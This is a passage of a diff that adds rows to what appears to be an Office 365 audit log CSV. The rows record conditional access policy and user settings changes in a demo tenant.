+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T05:52:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/8/2020 5:52:12 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-08T17:00:22Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-08T16:37:28Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-08T22:06:38Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T03:02:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 3:02:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/20/2020 6:04:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-20T06:04:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
